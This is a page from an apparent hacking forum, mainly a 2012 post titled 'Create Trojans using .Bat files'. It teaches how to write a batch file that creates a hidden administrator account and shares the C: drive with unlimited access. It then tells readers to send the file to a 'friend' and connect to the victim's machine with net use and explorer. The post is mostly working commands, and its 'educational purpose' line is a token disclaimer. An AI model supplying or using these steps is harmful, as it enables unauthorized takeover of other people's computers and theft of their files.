Join the forum, it's quick and easy

CYBER-HEAVEN
PLEASE REGESTER IF U LIKE OUR FORUM

THANX FOR VISITING

IF U WANT TO MODERATE THIS FORUM

REGESTER AND POST 3 NEW TOPICS IN ANY CATEGORY

U WILL BE MADE THE MODERATOR
CYBER-HEAVEN
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Search

Display results as :

Rechercher Advanced Search

Latest topics
» GET BEST AUDIO QUALTIY FROM YOUR WINDOWS PC
Create Trojans using .Bat files I_icon_minitimeThu Oct 03, 2013 12:36 am by Admin

» Dish Network Channel Starz, aim my dish network dish
Create Trojans using .Bat files I_icon_minitimeThu May 16, 2013 10:02 am by latinnoc

» Dish Network Little Elm Tx & dish network via broadband
Create Trojans using .Bat files I_icon_minitimeWed May 15, 2013 3:37 pm by latinnoc

» Dish Network Moving Promotions
Create Trojans using .Bat files I_icon_minitimeWed May 15, 2013 3:06 pm by latinnoc

» Dish Network Twc Channel - what channel is fox 1 on dish network
Create Trojans using .Bat files I_icon_minitimeWed May 15, 2013 9:00 am by latinnoc

» 005 Error Dish Network
Create Trojans using .Bat files I_icon_minitimeWed May 15, 2013 8:43 am by latinnoc

» Weta Kids Dish Network
Create Trojans using .Bat files I_icon_minitimeTue May 14, 2013 3:21 pm by latinnoc

» Dish Network In Augusta Maine
Create Trojans using .Bat files I_icon_minitimeTue May 14, 2013 2:44 pm by latinnoc

» hack torrent for increase speed using trackers
Create Trojans using .Bat files I_icon_minitimeThu Apr 11, 2013 4:09 pm by Fauriza

Who is online?
In total there are 2 users online :: 0 Registered, 0 Hidden and 2 Guests

None

[ View the whole list ]

Most users ever online was 50 on Mon Apr 12, 2021 4:46 pm
Social bookmarking

Social bookmarking reddit      

Bookmark and share the address of CYBER-HEAVEN on your social bookmarking website

Top posting users this week
No user

Like/Tweet/+1
BOOKMARK US

Create Trojans using .Bat files

Go down

Create Trojans using .Bat files Empty Create Trojans using .Bat files

Post by Admin Sun Oct 28, 2012 12:15 pm

What is a Trojan?
A Trojan, sometimes referred to as a Trojan horse, is non-self-replicating malware that appears to perform a desirable function for the user but instead facilitates unauthorized access to the user’s computer system.

Create Trojans using .Bat files Gc

Let us have a small tutorial on making Trojan which share ‘C’ drive and creates a new user with administrators access. We will use NET command in this process.

To know various commands involved with this NET command, Open Command Prompt-> Type cmd-> Press Enter and type Net, press Enter you will see something like this.

Create Trojans using .Bat files Untitled10-e1274174098178

In this tutorial we will use net user, net send and net share:

Open a Notepad to type the commands you can also use command prompt to check whether the commands are working or not.
Command -> net user username /add
It makes a new user called username(you can keep any desired name in place of username).
Command -> net localgroup administrators username /add
It makes the user(username) to get added to the administrators group.
Command ->net share system=C: /unlimited
This commands share the C: drive with the name of system.
Now keep these three commands in a Notepad and save it as any-name with .Bat extension and you are done.

Send this bat file to your friend as soon as the bat file is opened victim’s C: drive will be shared and a new administrator user will be created. Now to access the victim’s system you need to make a session with the remote computer using net use command, you should execute these commands from your dos prompt.

Commands to make this happen:

Command -> net use \victimip neo
In the above command in the place of victim’s place, the IP address of your friend, this command creates a session between you and victim. Twisted Evil
Command -> explorer \victimipsystem Twisted Evil
This will open a explorer window in the share system which is nothing but C: drive with administrators access. Twisted Evil
Now you can access the victim’s computer. clown This article is only for educational purpose we are not encouraging anyone to do illegal activities. clown
Admin
Admin
Admin
Admin

https://cyber-heaven.forumotion.com

Back to top Go down